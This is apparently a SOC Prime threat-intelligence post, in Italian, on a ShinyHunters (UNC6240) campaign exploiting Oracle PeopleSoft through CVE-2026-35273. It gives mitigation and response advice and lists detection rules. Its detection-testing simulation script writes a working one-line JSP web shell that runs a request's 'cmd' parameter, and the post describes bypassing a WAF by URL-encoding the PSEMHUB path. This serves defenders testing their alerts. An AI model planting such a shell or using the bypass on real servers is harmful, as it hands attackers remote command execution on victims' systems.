SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHunters Riprende Grandi Attacchi su Larga Scala che Prendono di Mira Oracle PeopleSoft

Author Photo
SOC Prime Team linkedin icon Segui
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

L’attore di minaccia UNC6240 (ShinyHunters) ha ripreso lo sfruttamento su larga scala dei sistemi Oracle PeopleSoft tramite CVE-2026-35273. La campagna sfrutta percorsi codificati in URL per aggirare i Web Application Firewall (WAF) e accedere al punto finale vulnerabile del Hub di Gestione Ambientale. Gli attaccanti distribuiscono più web shell insieme al backdoor SIDEEYE per stabilire la persistenza, mantenere l’accesso non autorizzato e facilitare l’esfiltrazione di dati.

Indagine

Mandiant e Google Threat Intelligence Group hanno documentato una transizione dallo sfruttamento di zero-day a giugno 2026 ad attacchi N-day contro ambienti non patchati. I ricercatori hanno identificato l’uso di codifica URL (/PSEMHUB/) per aggirare il filtraggio WAF basato su stringhe. L’analisi ha rivelato una sequenza d’attacco ricorrente che coinvolge la validazione del target attraverso oggetti Java serializzati, seguita dalla distribuzione di installatori trojanizzati e utility di tunneling.

Mitigazione

Le organizzazioni dovrebbero immediatamente installare la patch dell’Oracle Security Alert che affronta CVE-2026-35273 e disabilitare o rimuovere l’applicazione PSEMHUB. Le configurazioni WAF dovrebbero ispezionare e bloccare i percorsi URL normalizzati invece di affidarsi esclusivamente alla corrispondenza letterale di stringhe. I team di sicurezza dovrebbero anche ruotare le credenziali accessibili dal layer web ed esaminare le directory delle applicazioni alla ricerca di file sospetti o non autorizzati.

Risposta

Se viene scoperta una web shell, i difensori dovrebbero considerare l’host compromesso e preservare le prove forensi prima della rimedio. Abilitare l’auditing a livello di host per identificare processi shell inattesi lanciati dal processo Java di WebLogic. Ruotare le credenziali esposte, incluse le stringhe di connessione al database e le credenziali cloud, mentre si rivede l’attività di rete in uscita per gli indicatori noti di C2.

Flusso d’attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Possibile Enumerazione di Sistema (via cmdline)

Team SOC Prime
29 Set 2026

Comando e Controllo Sospetti da Richiesta DNS con Dominio di Primo Livello (TLD) Insolito (via dns)

Team SOC Prime
29 Set 2026

Possibile Manipolazione di Stringhe Codificate Base64 (via cmdline)

Team SOC Prime
29 Set 2026

Caricamento/Download di File Remoto tramite Strumenti Standard (via cmdline)

Team SOC Prime
29 Set 2026

IOC (HashSha256) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft

Regole SOC Prime AI
29 Set 2026

IOC (SourceIP) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft

Regole SOC Prime AI
29 Set 2026

IOC (DestinationIP) per rilevare: Campagna di Sfruttamento di Massa Rinnovata di ShinyHunters che Prende di Mira Oracle PeopleSoft

Regole SOC Prime AI
29 Set 2026

Distribuzione di Web Shell tramite Sfruttamento di CVE-2026-35273 [Creazione del Processo di Windows]

Regole SOC Prime AI
29 Set 2026

Sfruttamento UNC6240 di Oracle PeopleSoft usando Web Shell [Webserver]

Regole SOC Prime AI
29 Set 2026

Esecuzione della Simulazione

  • Narrativa dell’Attacco & Comandi: L’avversario identifica un’istanza di Oracle PeopleSoft e cerca di sfruttare una vulnerabilità. Per aggirare le semplici firme WAF che cercano la stringa “PSEMHUB”, l’attaccante utilizza la codifica URL per richiedere /PSEMHUB/. Dopo lo sfruttamento riuscito, l’attaccante rilascia una web shell chiamata x.jsp nella radice web per fornire un’interfaccia persistente per l’esecuzione di comandi. Questa sequenza imita i specifici indicatori di compromissione (IOC) identificati nella campagna di sfruttamento UNC6240.

  • Script di Test di Regressione:

    #!/bin/bash
    # Simulation Script for UNC6240 Web Shell Detection
    
    # 1. Define paths (Adjust based on target environment)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/PSEMHUB/"
    
    echo "[+] Creating simulated web shell: $WEB_ROOT/$SHELL_NAME"
    # Create a simple JSP web shell content
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] Triggering detection via URL-encoded request..."
    # Use curl to request the encoded path to generate the log entry
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] Simulation complete. Check SIEM for detection."
  • Comandi di pulizia:

    #!/bin/bash
    # Cleanup Script
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] Cleaning up simulation files..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] Cleanup finished."